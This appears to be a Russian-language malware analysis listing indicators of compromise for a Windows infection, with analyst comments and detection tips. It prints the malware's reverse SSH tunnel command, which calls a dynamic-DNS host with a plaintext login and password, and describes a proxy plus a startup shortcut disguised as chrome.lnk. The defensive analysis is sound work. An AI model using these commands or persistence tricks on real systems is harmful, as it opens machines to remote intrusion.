Техническая информация
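- %HOMEPATH%\Start Menu\Programs\Startup\chrome.lnk
  (ярлык в папке автозагрузки пользователя: запускается при каждом входе в систему; имя chrome.lnk, по-видимому, выбрано для маскировки под браузер)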
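- 'C:\Users.Msi\System.exe' -ssh -R 47420:127.0.0.1:2103 64http.hopto.org -l 64http -pw 2n16122N
  (ключи -ssh, -R, -l и -pw соответствуют синтаксису командной строки клиентов PuTTY/plink, а создаваемый файл PUTTY.RND — это файл начального значения генератора случайных чисел PuTTY; по-видимому, System.exe — переименованный SSH-клиент, который открывает обратный туннель: порт 47420 на удалённом узле перенаправляется на локальный 127.0.0.1:2103. Признаки для обнаружения: исходящие соединения на порт 22 к узлам динамического DNS и процессы с аргументом -R в командной строке)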
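- 'C:\Users.Msi\hellper.exe' -d -t -l -e0.0.0.0 -i127.0.0.1 -p2103 -a
  (набор ключей напоминает параметры прокси-сервера, предположительно 3proxy, — требует подтверждения по образцу; указанные адрес 127.0.0.1 и порт 2103 совпадают с локальной конечной точкой SSH-перенаправления из командной строки System.exe)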
- '<SYSTEM32>\wscript.exe' "C:\Users.Msi\hellper.vbe"
- %TEMP%\pic.url
- C:\Users.Msi\System.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\supersize[1].pl
- <LS_APPDATA>\PUTTY.RND
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- C:\Users.Msi\hellper.vbe
- C:\Users.Msi\hellper.exe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- 'www.us#.com':80
- '64####.hopto.org':22
- 'localhost':1037
- www.us#.com/supersize.pl?se######################
- DNS ASK www.us#.com
- DNS ASK 64####.hopto.org
- ClassName: 'MS_AutodialMonitor' WindowName: '(null)'
- ClassName: 'MS_WebcheckMonitor' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: '' WindowName: '(null)'